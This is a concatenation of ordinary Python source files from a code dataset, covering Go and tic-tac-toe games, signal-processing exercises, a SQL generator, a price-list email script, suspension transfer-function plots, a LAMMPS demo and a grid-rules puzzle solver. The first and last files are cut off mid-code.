visited[n[0]][n[1]])):\n\t\t\t\t\t\t\tvisited[n[0]][n[1]] = True\n\t\t\t\t\t\t\tq.put(n)\n\t\t\t\t# Check that all things that things that shouldn't be removed weren't removed\n\t\t\t\tremoved_sorted = sorted(removed)\n\t\t\t\tdead_removed_sorted = sorted(dead_removed)\n\n\t\t\t\tif (removed_sorted != dead_removed_sorted):\n\t\t\t\t\treturn False\n\n\t\t\t\tif ((stone == \"B\") and (len(removed_sorted) == 0) and (white_b4 != len(self.get_points(\"W\", try_place)))):\n\t\t\t\t\treturn False\n\n\t\t\t\tif ((stone == \"W\") and (len(removed_sorted) == 0) and (black_b4 != len(self.get_points(\"B\", try_place)))):\n\t\t\t\t\treturn False\n\n\n\t\t\t\t# If still no liberties present after removal of dead, then invalid move\n\t\t\t\tif (not self.reachable(placed[0][1], \" \", try_place)):\n\t\t\t\t\treturn False\n\n\t\t# Can only add one stone every turn or pass\n\t\tif (len(placed) > 1):\n\t\t\treturn False\n\n\t\treturn True\n\n\n\n\t###############################\n\t# QUERIES\n\t###############################\n\n\t# Occupied takes an index tuple and returns True\n\t# if board at that point is not Empty (\" \"), else False\n\tdef occupied(self, idx, board):\n\t\treturn (board[idx[0]][idx[1]] != \" \")\n\n\t# Occupies takes an index tuple and returns True if\n\t# board at that point has that Stone, else False\n\tdef occupies(self, stone, idx, board):\n\t\treturn (board[idx[0]][idx[1]] == stone)\n\n\t# Return True if there is a path of adjacent points to Point\n\t# that have the same kind of MaybeStone as the given point and\n\t# the path reaches the given MaybeStone, else False\n\tdef reachable(self, idx, maybe_stone, board):\n\t\tvisited = 
[ [False] * self.board_size for row in range(self.board_size)]\n\n\t\tstart_type = board[idx[0]][idx[1]]\n\t\tif (start_type == maybe_stone):\n\t\t\treturn True\n\n\t\tq = Queue.Queue()\n\t\tq.put(idx)\n\n\t\twhile (q.empty() != True):\n\t\t\tcheck_point = q.get()\n\t\t\tif (not visited[check_point[0]][check_point[1]]):\n\t\t\t\tvisited[check_point[0]][check_point[1]] = True\n\t\t\t\tneighbors = self.find_neighbors(check_point)\n\t\t\t\tfor n in neighbors:\n\t\t\t\t\trow = n[0]\n\t\t\t\t\tcol = n[1]\n\t\t\t\t\tif (board[row][col] == maybe_stone):\n\t\t\t\t\t\treturn True\n\t\t\t\t\tif (board[row][col] == start_type):\n\t\t\t\t\t\tq.put(n)\n\t\treturn False\n\n\n\n\t###############################\n\t# COMMANDS\n\t###############################\n\n\t# Passes turn\n\tdef pass_turn(self, player):\n\t\treturn True\n\n\t# Places a stone at the given point on a go_board if not occupied\n\tdef place(self, stone, idx, board):\n\t\tif (self.occupied(idx, board)):\n\t\t\treturn \"This seat is taken!\"\n\t\telse:\n\t\t\tnew_board = [ [\" \"] * self.board_size for row in range(self.board_size)]\n\t\t\tfor row in range(self.board_size):\n\t\t\t\tfor col in range(self.board_size):\n\t\t\t\t\tnew_board[row][col] = board[row][col]\n\t\t\tnew_board[idx[0]][idx[1]] = stone\n\t\t\t\n\t\t\treturn new_board\n\n\t# Removes a stone from given point on go_board if occupied\n\tdef remove(self, stone, idx, board):\n\t\tif ((self.occupied(idx, board) == False) or (not self.occupies(stone, idx, board))):\n\t\t\treturn \"I am just a board! I cannot remove what is not there!\"\n\t\telse:\n\t\t\tnew_board = [ [\" \"] * self.board_size for row in range(self.board_size)]\n\t\t\tfor row in range(self.board_size):\n\t\t\t\tfor col in range(self.board_size):\n\t\t\t\t\tnew_board[row][col] = board[row][col]\n\t\t\tnew_board[idx[0]][idx[1]] = \" \"\n\t\t\t\n\t\t\treturn new_board\n\n\t# Returns array of points that maybe_stone occupies on go_board\n\tdef get_points(self, maybe_stone, board):\n\t\tpoints = []\n\t\tfor x in range(self.board_size):\n\t\t\tfor y in range(self.board_size):\n\t\t\t\tif (board[x][y] == maybe_stone):\n\t\t\t\t\tpoints.append(self.idx_to_point(y, x))\n\t\tpoints = sorted(points)\n\t\treturn points\n\n\n\n\t###############################\n\t# HELPER FUNCTIONS\n\t###############################\n\t# Converts point from \"N-N\" to indices\n\tdef point_to_idx(self, point):\n\t\tidx = point.split(\"-\")\n\t\tfor i in range(len(idx)):\n\t\t\tidx[i] = int(idx[i])\n\n\t\treturn idx[1] - 1, idx[0] - 1\n\n\t# Converts indices to \"N-N\" point position\n\tdef idx_to_point(self, x, y):\n\t\treturn str(x + 1) + \"-\" + str(y + 1)\n\n\t# Finds all the adjacent neighbors to a given point\n\tdef find_neighbors(self, idx):\n\t\tneighbors = []\n\t\tx_pos = [-1, 0, 1, 0]\n\t\ty_pos = [0, 1, 0, -1]\n\n\t\tfor i in range(4):\n\t\t\tn_x = idx[0] + x_pos[i]\n\t\t\tn_y = idx[1] + y_pos[i]\n\t\t\tif ((n_x >= 0 and n_x <= 18) and (n_y >= 0 and n_y <= 18)):\n\t\t\t\tpoint_idx = (n_x, n_y)\n\t\t\t\tneighbors.append(point_idx)\n\n\t\treturn neighbors\n\n\t# Gets other player\n\tdef get_opponent(self, curr_player):\n\t\treturn \"W\" if (curr_player == \"B\") else \"B\"\n\n\t# Gets player move order\n\tdef get_player_order(self, board0, board1, board2, curr_player):\n\t\torder = []\n\n\t\tif (board1 == board2):\n\t\t\torder.append(curr_player)\n\t\telse:\n\t\t\tfor row in range(self.board_size):\n\t\t\t\tfor col in range(self.board_size):\n\t\t\t\t\tif (board2[row][col] != board1[row][col]):\n\t\t\t\t\t\tif (board2[row][col] == \" 
\"):\n\t\t\t\t\t\t\torder.append(board1[row][col])\n\n\n\t\tif (self.get_points(\" \", board0) == self.get_points(\" \", board1)):\n\t\t\torder.append(self.get_opponent(curr_player))\n\t\telse:\n\t\t\tfor row in range(self.board_size):\n\t\t\t\tfor col in range(self.board_size):\n\t\t\t\t\tif (board1[row][col] != board0[row][col]):\n\t\t\t\t\t\tif (board1[row][col] == \" \"):\n\t\t\t\t\t\t\torder.append(board0[row][col])\n\t\torder.append(curr_player)\n\n\t\tif (len(order) == 3):\n\t\t\tif ((order[0] != order[2]) or (order[0] == order[1]) or (order[1] == order[2])):\n\t\t\t\treturn False\n\n\t\treturn True\n\n\t# Checks that all stones w/out liberties removed from board\n\tdef check_dead_removed(self, board):\n\t\tfor row in range(self.board_size):\n\t\t\tfor col in range(self.board_size):\n\t\t\t\tif ((board[row][col] == \"B\") and (not self.reachable((row, col), \" \", board))):\n\t\t\t\t\treturn False\n\t\t\t\telif ((board[row][col] == \"W\") and (not self.reachable((row, col), \" \", board))):\n\t\t\t\t\treturn False\n\n\t\treturn True\n\n","sub_path":"Deliverables/5/5.1/go.py","file_name":"go.py","file_ext":"py","file_size_in_byte":20873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"414600744","text":"theBoard = {'top-L': ' ', 'top-M': ' ', 'top-R': ' ',\n\t\t\t'mid-L': ' ', 'mid-M': ' ', 'mid-R': ' ',\n\t\t\t'low-L': ' ', 'low-M': ' ', 'low-R': ' '} # dictionary of the tic tac toe board\n\ndef printBoard(board): # draws the tic tac toe board on the screen\n\tprint(board['top-L'] + '|' + board['top-M'] + '|' + board['top-R'])\n\tprint('-+-+-')\n\tprint(board['mid-L'] + '|' + board['mid-M'] + '|' + board['mid-R'])\n\tprint('-+-+-')\n\tprint(board['low-L'] + '|' + board['low-M'] + '|' + board['low-R'])\n\ndef mover(turn, move):\n\tmove = input(\"Enter a space on the grid for your \" +turn+ \" mark to be placed. \\n\")\n\tprint(\"\")\n\tif not (theBoard.get(move) == 'X' or theBoard.get(move) == 'O'):\n\t\ttheBoard[move] = turn\n\t\tprintBoard(theBoard)\n\t\tturnSwitcher(turn)\n\telse:\n\t\tprint(\"The space\" +move+ \" is filled with a \" +turn+ \" already. 
Please try again!\")\n\t\tmover(turn, move)\n\ndef winningCombos(): # deteremines if either user X or user Y has achieved a winning combination\n\t# X possibilities vertical\n\tif (((theBoard['top-L'] == 'X') and (theBoard['mid-L'] == 'X') and (theBoard['low-L'] == 'X')) or ((theBoard['top-M'] == 'X') and (theBoard['mid-M'] == 'X') and (theBoard['low-M'] == 'X')) or ((theBoard['top-M'] == 'X') and (theBoard['mid-R'] == 'X') and (theBoard['low-R'] == 'X'))):\n\t\tprint('The winner is X!')\n\t\treturn True\n\t# Y possibilities vertical'\n\tif (((theBoard['top-L'] == 'Y') and (theBoard['mid-L'] == 'Y') and (theBoard['low-L'] == 'Y')) or ((theBoard['top-M'] == 'Y') and (theBoard['mid-M'] == 'Y') and (theBoard['low-M'] == 'Y')) or ((theBoard['top-M'] == 'Y') and (theBoard['mid-R'] == 'Y') and (theBoard['low-R'] == 'Y'))):\n\t\tprint('The winner is O!')\n\t\treturn True\n\t# X possibilities horizontal\n\tif (((theBoard['top-L'] == 'X') and (theBoard['top-M']== 'X') and (theBoard['top-R'] == 'X')) or ((theBoard['mid-L'] == 'X') and (theBoard['mid-M']== 'X') and (theBoard['mid-R'] == 'X')) or ((theBoard['low-L'] == 'X') and (theBoard['low-M'] == 'X') and (theBoard['low-R'] == 'X'))):\n\t\tprint('The winner is X!')\n\t\treturn True\n\t# Y possibilities horizontal\n\tif (((theBoard['top-L'] == 'Y') and (theBoard['top-M']== 'Y') and (theBoard['top-R'] == 'Y')) or ((theBoard['mid-L'] == 'Y') and (theBoard['mid-M']== 'Y') and (theBoard['mid-R'] == 'Y')) or ((theBoard['low-L'] == 'Y') and (theBoard['low-M'] =='Y') and (theBoard['low-R'] == 'Y'))):\n\t\tprint('The winner is O!')\n\t\treturn True\n\t# X possibilities diagonal\n\tif (((theBoard['top-L'] == 'X') and (theBoard['mid-M'] == 'X') and (theBoard['low-R'] == 'X')) or ((theBoard['top-R'] == 'X') and (theBoard['mid-M'] == 'X') and (theBoard['low-L'] == 'X'))):\n\t\tprint('The winner is X!')\n\t\treturn True\n\t# Y possibilities diagonal\n\tif (((theBoard['top-L'] == 'Y') and (theBoard['mid-M'] == 'Y') and (theBoard['low-R'] == 'Y')) or ((theBoard['top-R'] == 'Y') and (theBoard['mid-M'] == 'Y') and (theBoard['low-L'] == 'Y'))):\n\t\tprint('The winner is O!')\n\t\treturn True\n\telse:\n\t\treturn False\n\ndef turnSwitcher(turn):\n\tif turn == 'X':\n\t\tturn = 'O'\n\telse:\n\t\tturn = 'X'\n\treturn turn\n\ndef switchTheTurn(switchIt, turn):\n\tif switchIt is True:\n\t\tif turn == 'X':\n\t\t\tturn = 'O'\n\t\telse:\n\t\t\tturn = 'X'\n\t\t\t\n\tif switchIt is False:\n\t\tturn = turn\n\treturn turn\n\n\n\t\t\n\ndef main():\n\tprint(\"Welcome to Tic Tac Toe!\")\n\tprint(\"Instructions: Player X will go first. \\n When prompted to enter a space, you may enter: \\n top-L, top-M, top-R \\n mid-L, mid-M, mid-R \\n low-L, low-M, low-R\")\n\tprint(\"\")\n\tprintBoard(theBoard)\n\tprint(\"\")\n\tturn = 'X'\n\tturn_counter = 0;\n\twhile not winningCombos() is True and turn_counter < 8:\n\t\tmove = ''\n\t\tmove = input(\"Enter a space on the grid for your \" +turn+ \" mark to be placed. \\n\")\n\t\tprint(\"\")\n\n\t\tif not move in theBoard.keys():\n\t\t\tprint(\"That is an invalid position! Try again!\")\n\t\t\tprint(\"\")\n\t\t\tprintBoard(theBoard)\n\t\t\tswitchIt = False\n\n\n\n\t\telif not (theBoard.get(move) == 'X' or theBoard.get(move) == 'O'):\n\t\t\ttheBoard[move] = turn\n\t\t\tprintBoard(theBoard)\n\t\t\tprint(\"\")\n\t\t\tswitchIt = True\n\t\t\tturn_counter = turn_counter + 1\n\n\t\t\t\n\t\telse:\n\t\t\tprint(\"The space \" +move+ \" is filled with a \" +turn+ \" already. 
Please try again!\")\n\t\t\tprintBoard(theBoard)\n\t\t\tprint(\"\")\n\t\t\tswitchIt = False\n\n\t\tturn = switchTheTurn(switchIt, turn)\n\tprint(\"There is no winner :(\")\n\t\t\t\n\nmain()\n\n\n\n","sub_path":"ticTacToe.py","file_name":"ticTacToe.py","file_ext":"py","file_size_in_byte":4219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"210686874","text":"# -*- coding: utf-8 -*-\nimport info\nfrom Package.CMakePackageBase import *\n\n\nclass subinfo(info.infoclass):\n def setTargets(self):\n self.targets['0.18'] = 'http://ftp.gnu.org/pub/gnu/gettext/gettext-0.18.tar.gz'\n self.targetInstSrc['0.18'] = \"gettext-0.18\"\n self.patchToApply['0.18'] = [(\"gettext-0.18-20130523.diff\", 1)]\n self.targetDigests['0.18'] = 'de396ec6877a451427d8597197d18c2d4b8f1a26'\n self.description = \"GNU internationalization (i18n)\"\n self.defaultTarget = '0.18'\n\n def setDependencies(self):\n self.runtimeDependencies[\"virtual/base\"] = \"default\"\n self.runtimeDependencies[\"win32libs/win_iconv\"] = \"default\"\n\n\nclass Package(CMakePackageBase):\n def __init__(self, **args):\n CMakePackageBase.__init__(self)\n","sub_path":"win32libs/gettext/gettext.py","file_name":"gettext.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"246705777","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\ndef GenSig(N,k,type):\n A = np.zeros(N)\n if(type == 'I'):\n A[k] = 1\n if(type == 'S'):\n for i in range(k,N):\n A[i] = 1\n if(type == 'R'):\n for i in range(k,N):\n A[i] = i\n return A\n\ndef question_1_2():\n R = GenSig(20,5,'I') \n plt.figure(1) \n plt.stem(R) \n\ndef question_2():\n R = GenSig(20,5,'S') \n plt.figure(2) \n plt.stem(R) \n\ndef question_3():\n R = GenSig(20,5,'R') \n plt.figure(3) \n plt.stem(R) \n\ndef question_4():\n R = GenSig(20,6,'S') + GenSig(20,7,'R') - 6*GenSig(20,7,'S')\n R += -GenSig(20,11,'R') + 9*GenSig(20,11,'S') - GenSig(20,12,'R') \n R += 11*GenSig(20,12,'S') + GenSig(20,16,'R') - 15*GenSig(20,16,'S')\n plt.figure(4) \n plt.stem(R)\n\ndef genSin(N,f,fs):\n t = np.linspace(0,(N-1)/fs,N)\n R = np.sin(2 * np.pi * f * t)\n plt.figure(5) \n plt.stem(R)\n \ndef genCos(N,f,fs):\n R = np.zeros(N)\n for i in range(f,N):\n R[i] = np.cos(2 * np.pi * f * (i/fs))\n plt.figure(6) \n plt.plot(R)\n\ndef question_5_2(N,f,fs):\n t = np.linspace(0,(N-1)/fs,N)\n R = np.sign(np.sin(2 * np.pi * f * t))\n plt.figure(7) \n plt.plot(R)\n\ndef question_5_2_alt(N,f,fs):\n R = np.zeros(fs*(f+1))\n T = np.zeros(N)\n for i in range(0,f+1):\n nb = i * fs\n for j in range(1,fs+1):\n if((j <= (fs/2)+1) and (nb+j-1 != nb)):\n R[nb+j-1] = 1\n else : \n R[nb+j-1] = -1\n R[0] = 0\n for i in range(0,N):\n T[i] = R[i]\n plt.figure(8) \n plt.plot(T)\n plt.stem(T)\n \ndef question_5_3(f,fs):\n return f*fs\n\nimport cmath as cm\ndef expsig(n,a):\n isreal = np.isreal(a)\n result = np.zeros(n)\n if(isreal == True):\n for i in range(n):\n result[i] = np.power(i,a)\n else :\n theta = cm.phase(a)\n for i in range(n):\n result[i] = (a.real**i) * (np.cos(theta * i) + np.sin(theta * i)) \n print(result)\n plt.figure(9)\n plt.plot(result)\n plt.stem(result)\n \na = 0.95 ** cm.exp(complex(0.0,(np.pi/10)))\nexpsig(50,a)","sub_path":"2163_Traitement_Numerique/TP2/.ipynb_checkpoints/TP2(1)-checkpoint.py","file_name":"TP2(1)-checkpoint.py","file_ext":"py","file_size_in_byte":2118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} 
+{"seq_id":"544254592","text":"import re\n\n\"\"\"\nCount what number of line it is\n\"\"\"\n\ncount = 31\ncode_name = \"code.txt\"\n\nif_position1 = 42\nif_position2 = 67\n\nf_position1 = 51\nf_position2 = 96\n\ndef rm(text):\n\n\trm = re.compile(r\"\\n\")\n\n\treturn rm.sub(\"\", text)\n\n# `````````````````````````````````````````````\n# Configs\n# Change these lines of code if you're switching the tables.\n\ntemplate_name = \"template.sql\"\nfile_name = \"sql_if.sql\"\n\noutput_head = \"delete_if/DEL_IF_EDASH_STATISTICSDATA_\"\noutput_tail = \".sql\"\n\nposition1 = if_position1\nposition2 = if_position2\n\n\n# `````````````````````````````````````````````\n\ntexts = \"\"\n\ncode = \"\"\ntemplate = \"\"\n\nwith open(template_name, \"r\", encoding=\"utf-8\") as f:\n\ttemplate = f.read()\n\nstr_head = template[0:position1]\n# str_mid = template[position1:position2]\nstr_tail = template[position2:]\n\n\nf = open(code_name, \"r\", encoding=\"utf-8\")\n\nfor index in range(count):\n\n\ttext = \"\"\n\n\tcode = rm(f.readline())\n\n\tif len(code) == 25:\n\n\t\ttext = str_head + code + str_tail\n\n\t\t# Comment this line of code if you're deleting\n\t\t# text = text + code + str_tail\n\n\t\t# print(text)\n\n\t\t#texts = texts + text + \"\\n\\n\"\n\n\twith open(output_head+code+output_tail, \"w\", encoding=\"utf-8\") as f_h:\n\t\tf_h.write(text)\n\t\t\nf.close()\n\n# with open(file_name, \"w\", encoding=\"utf-8\") as f:\n# \tf.write(texts)\n\n# print(\"Successfully generated .sql file.\")\n","sub_path":"code/sql/create_sql.py","file_name":"create_sql.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"442874856","text":"import ftplib\nfrom datetime import date,datetime\nimport requests\nfrom zipfile import ZipFile\nimport smtplib,ssl\nfrom email.mime.text import MIMEText\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.base import MIMEBase\nfrom email import encoders\nimport os\n\ntoday1= datetime.today().strftime('%Y.%m.%d')\ntoday = datetime.today().strftime('%d-%m-%Y')\nSUBJECT = f\"Brodos Pricelist citytalk {today}\"\nEMAIL_TO = ['hardware@citytalk.gmbh','Vertrieb-Hardware@brodos.de','rncteam@brodos.net']\n#EMAIL_TO = ['ankur.paranjpe@brodos.net','yash.joshi@brodos.net']\n\n\nmessage_failed = \"\"\"From: \nSubject: City Talk Pricelist Error!\n\nCity Talk Pricelist didnt found on the required path or not refreshed successfully. 
Please check manually!\n\"\"\"\n\ntry:\n msg = MIMEMultipart()\n msg['Subject'] = SUBJECT \n msg['From'] = 'rncteam@brodos.net'\n msg['To'] = ', '.join(EMAIL_TO)\n #msg['Bcc'] = ['distribution@brodos.de']\n part = MIMEBase('application', \"octet-stream\")\n part.set_payload(open(f\"I:/Abteilungen/Reporting_und_Controlling/private/Preislisten/2xm_City Talk/testingxlsx/Brodos PRL {today1}.xlsx\", \"rb\").read(),'UTF-8')\n encoders.encode_base64(part)\n part.add_header('Content-Disposition', f'attachment; filename=\"Brodos PRL {today1}.xlsx\"')\n msg.attach(part)\n body = f\"\"\"Hallo Herr Zintl,\\n\\n\nanbei sende ich Ihnen wie gewünscht eine Liste mit aktuellen Preisen und Lagerbeständen aus dem Brodos Lager.\\n\\n\nSie sind dazu verpflichtet die Liste vertraulich zu behandeln und nicht an Dritte weiter zu geben.\\n\\n\nAlle Bestellungen von Ihnen sind verbindlich und werden sofort bearbeitet und versendet.\\n\\n\nFür alle weiteren Richtlinien zu Zahlungsbedingungen und Lieferbedingungen gelten unsere AGBs.\"\"\"\n part2 = MIMEText(body,'plain')\n msg.attach(part2)\n server = smtplib.SMTP('172.17.7.101')\n server.sendmail('rncteam@brodos.net', EMAIL_TO, msg.as_string())\n \nexcept Exception as e:\n print(e)\n smtpObj = smtplib.SMTP('172.17.7.101')\n smtpObj.sendmail('rncteam@brodos.net', 'rncteam@brodos.net', message_failed) \n\n\n","sub_path":"2xm_city talk/mail_sending.py","file_name":"mail_sending.py","file_ext":"py","file_size_in_byte":2093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"408062377","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nfrom measurements.susdtt import SusDtt\nfrom models.susmodel import SusModel\n\ndef bode_model(optic,stage,dof): \n model = SusModel(optic) \n start = 'ctrl_typeBp/exc_{0}{1}'.format(stage,dof)\n \n # These differencies should be eliminated.. 
\n if stage=='IM':\n end = 'ctrl_typeBp/OSEM_{0}{1}'.format(stage,dof)\n elif stage in ['SF','BF'] and dof=='GAS':\n end = 'ctrl_typeBp/LVDT_{0}{1}'.format(stage,dof) \n elif stage=='BF':\n end = 'ctrl_typeBp/LVDT_{0}{1}'.format(stage,dof)\n elif stage=='TM':\n end = 'ctrl_typeBp/OpLev_{0}{1}'.format(stage,dof)\n else:\n raise ValueError('!')\n freq = np.logspace(-2,1,1001) \n freq,gain = model.tf(start,end,freq)\n return freq, gain\n\ndef bode_measurement(optic,stage,dof):\n prefix = './measurements/{0}/'.format(optic)\n fname = prefix + '{0}_{1}{2}.xml'.format(optic,stage,dof)\n meas = SusDtt(fname)\n _from = 'K1:VIS-{0}_{1}_TEST_{2}_EXC'.format(optic,stage,dof)\n\n # These differencies should be eliminated..\n if optic=='PR2' and stage=='BF' and dof!='GAS':\n _to = 'K1:VIS-{0}_{1}_DAMP_{2}_IN1'.format(optic,stage,dof)\n elif optic=='PR2' and stage=='IM' and dof in ['L','R','P','Y']:\n _to = 'K1:VIS-{0}_{1}_DAMP_{2}_IN1'.format(optic,stage,dof) \n elif stage in ['IP','SF','BF','IM']:\n _to = 'K1:VIS-{0}_{1}_DAMP_{2}_IN1_DQ'.format(optic,stage,dof) \n elif stage=='TM':\n _dict = {'L':'LEN','P':'PIT','Y':'YAW'}\n _to = 'K1:VIS-{0}_{1}_OPLEV_{2}_DIAG_DQ'.format(optic,stage,_dict[dof])\n else:\n raise ValueError('!')\n \n _freq, _gain, _coh = meas.tf(_from,_to)\n return _freq, _gain, _coh\n\ndef plot_compliance(optic,stage,dofs): \n fig,ax = plt.subplots(3,3,sharex='col',sharey='row',figsize=(10,6))\n plt.subplots_adjust(hspace=0.1, wspace=0.15,\n left=0.1, right=0.95,\n top=0.88, bottom=0.1)\n\n title = 'Compliance of {0}_{1}_{2}.png'.format(optic,stage,''.join(dofs))\n plt.suptitle(title,fontsize=18)\n for i,dof in enumerate(dofs[:3]):\n freq, gain = bode_model(optic,stage,dof)\n _freq, _gain, _coh = bode_measurement(optic,stage,dof)\n gain *= np.mean((np.abs(_gain)[:5]/np.abs(gain)[:5])) #[1]\n ax[0][i].loglog(freq,np.abs(gain),'k-',label='Model')\n ax[0][i].loglog(_freq,np.abs(_gain),'ro',markersize=2,\n label='Measurement')\n ax[1][i].semilogx(freq,np.rad2deg(np.angle(gain)),'k-')\n ax[1][i].semilogx(_freq,np.rad2deg(np.angle(_gain)),'ro',\n markersize=2,label='Measured')\n ax[0][i].set_title('{0} -> {1}'.format(dof,dof))\n ax[2][i].semilogx(_freq,_coh,'ro',markersize=2)\n ax[1][i].set_xlim(1e-2,1e1) \n ax[1][i].set_yticks(range(-180,181,90))\n ax[2][i].set_xlabel('Frequency [Hz]')\n ax[1][i].grid(which='major',color='black',linestyle='-')\n ax[1][i].grid(which='minor',color='black',linestyle=':')\n ax[0][i].grid(which='major',color='black',linestyle='-')\n ax[0][i].grid(which='minor',color='black',linestyle=':')\n ax[2][i].grid(which='major',color='black',linestyle='-')\n ax[2][i].grid(which='minor',color='black',linestyle=':')\n ax[0][i].legend(loc='upper left')\n ax[0][0].set_ylabel('Magnitude')\n ax[1][0].set_ylabel('Phase [Degree]')\n ax[2][0].set_ylabel('Coherence')\n ax[0][0].set_ylim(1e-4,1e2)\n ax[1][0].set_ylim(-181,181)\n ax[2][0].set_ylim(0,1)\n fname = './figures/Compliance_{0}_{1}_{2}.png'.format(optic,stage,''.join(dofs))\n plt.savefig(fname)\n print(fname)\n plt.close()\n \n # [1] Adjust the model data to the measured one. 
Note that the\n # data points in lower frequency are unreliable.\n\n\nif __name__=='__main__':\n plot_compliance('PR2','SF',['GAS'])\n plot_compliance('PR2','BF',['GAS']) \n plot_compliance('PR2','BF',['L','T','V'])\n plot_compliance('PR2','BF',['R','P','Y']) \n plot_compliance('PR2','IM',['L','T','V'])\n plot_compliance('PR2','IM',['R','P','Y'])\n plot_compliance('PR2','TM',['L','P','Y'])\n plot_compliance('PR3','SF',['GAS'])\n plot_compliance('PR3','BF',['GAS']) \n plot_compliance('PR3','BF',['L','T','V'])\n plot_compliance('PR3','BF',['R','P','Y']) \n plot_compliance('PR3','IM',['L','T','V'])\n plot_compliance('PR3','IM',['R','P','Y'])\n plot_compliance('PR3','TM',['L','P','Y'])\n plot_compliance('PRM','SF',['GAS'])\n plot_compliance('PRM','BF',['GAS']) \n plot_compliance('PRM','BF',['L','T','V'])\n plot_compliance('PRM','BF',['R','P','Y']) \n plot_compliance('PRM','IM',['L','T','V'])\n plot_compliance('PRM','IM',['R','P','Y'])\n plot_compliance('PRM','TM',['L','P','Y'])\n","sub_path":"example_compare_tf.py","file_name":"example_compare_tf.py","file_ext":"py","file_size_in_byte":4825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"606976809","text":"\"\"\"\nThis constructs a single nanoparticle with 20 ligands and outputs a data file containing data for\nthat nanoparticle and a membrane, and a LAMMPS script to read that data and run a demo simulation.\nIf run as a python script it will run the generated LAMMPS script and produce plotable output in a\n'demo' folder.\n\"\"\"\n \nfrom nanoparticle import NanoParticle, Ligand\nfrom membranesimulation import MembraneSimulation\n\nimport parlammps\n\nimport math\nimport os\nimport argparse\n\nparser = argparse.ArgumentParser(description='Creates and runs a demo simulation.')\n\n#MPI Options\nparser.add_argument('-mpi','--mpi', action='store_true', help='option to run in parallel')\nparser.add_argument('-np','--nodes', default=4, type=int, help='number of cores used per mpi process')\nparser.add_argument('-tm','--timeout', default=1800, type=int, help='mpirun timeout')\n\nparser.add_argument('-c','--clean', action='store_true', help='option to remove data and script files when done')\n\nargs = parser.parse_args()\n\n# nanoparticle parameters don't change a thing because they are hardcoded in the data & script templates !!?!\nnp = NanoParticle()\nfor i in range(4):\n phi = i*(math.pi/2)\n for j in range(5):\n theta = math.pi/10 + j*(math.pi/5)\n np.addLigand(Ligand(rad=np.sig, polAng=theta, aziAng=phi, mass=1.0, eps=10.0, sig=1.0))\n\nwd = os.path.dirname(os.path.realpath(__file__))\n \nsimulation = MembraneSimulation(\"demo\", np, 10000, 0.01, os.path.join(wd,'demo'), os.path.join(wd,'demo'),\n os.path.join(wd,'mem/template/data.template'),\n os.path.join(wd,'mem/template/in.template'),\n corepos_x=0.0, corepos_y=0.0, corepos_z=7.0)\n\nsimulation.saveFiles()\nscript = os.path.join(simulation.filedir, simulation.scriptName)\n \nif (args.mpi):\n parlammps.runSim(script, args.nodes, args.timeout, silent=False)\nelse:\n parlammps.runSimSerial(script)\n\nif (args.clean):\n simulation.deleteFiles()\n","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"550511764","text":"#!/usr/bin/env python\n\nimport string\nimport math\nimport re\nimport sys\nimport numpy as np\n\nfrom numba import jit\n\ndebug=False\nfileName = \"input2.txt\"\n\n## Load and permutate the 
rules\nrules = {}\nfor l in map(lambda x: x.strip(), open(fileName).readlines()):\n\tm = re.search('(.*) => (.*)?$',l)\n\tr1 = \"\".join(m.group(1).strip().split(\"/\"))\n\tr2 = \"\".join(m.group(2).strip().split(\"/\"))\n\tr1 = np.array( [1 if c ==\"#\" else 0 for c in r1])\n\t\n\n\tif len(r1) == 4:\n\t\tr1 = r1.reshape((2,2))\n\telse:\n\t\tr1 = r1.reshape((3,3))\n\n\tfor k in range(4):\n\t\trot = np.rot90(r1, k=k)\n\t\ttmp = \"\".join(['#' if c==1 else '.' for c in rot.flatten()])\n\t\trules[tmp] = r2\n\t\ttmp = \"\".join(['#' if c==1 else '.' for c in np.fliplr(rot).flatten()])\n\t\trules[tmp] = r2\n\t\ttmp = \"\".join(['#' if c==1 else '.' for c in np.flipud(rot).flatten()])\n\t\trules[tmp] = r2\n\n## Look up the correct rule and return it\ndef recode(x):\n\tglobal rules\n\ty = \"\".join(x)\n\treturn list(rules[y])\n\n## return the subcube in range with w\n@jit\ndef getRange(cube, x,y,w):\n\tret = []\n\tx = int(x)\n\ty = int(y)\n\tw = int(w)\n\n\tlineW = int( math.sqrt(len(cube)))\n\tfor i in range(w):\n\t\tt = ((y+i)*lineW)+x\n\t\tret = ret + cube[ t:t+w ]\n\treturn ret\n\n## take the 4 subparts and combine back into a full cube\ndef combineCubes(q1,q2,q3,q4):\n\tlineW = int( math.sqrt(len(q1)))\n\tr1 = []\n\tr2 = []\n\tfor i in range(lineW):\n\t\t\tr1 = r1 + q1[i*lineW:i*lineW+lineW] + q2[i*lineW:i*lineW+lineW]\n\t\t\tr2 = r2 + q3[i*lineW:i*lineW+lineW] + q4[i*lineW:i*lineW+lineW]\n\treturn r1+r2\n\n@jit\ndef getSubCubes(cube, s):\n\tsubCubes = []\n\tl = len(cube)\n\tsideLength = int(math.sqrt(l)) # how long is each side\n\tcubesPerRow = int(sideLength / s) # how many cubes in each row\n\n\tfor y in range(0,cubesPerRow):\n\t\tfor x in range(0,cubesPerRow):\n\t\t\tsubCubes.append( getRange(cube, x*s,y*s,s) )\n\treturn subCubes\n\n\n#cube = list('#..#........#..#')\n@jit\ndef combineSubCubes(cubes):\n\treturnCube = []\n\tnumCubes =len(cubes)\n\tcubesPerRow = int(math.sqrt(numCubes))\n\tcubesize = int(math.sqrt(len(cubes[0])))\n\n\t#print( numCubes, cubesPerRow, cubesize)\n\tfor i in range(0, numCubes, 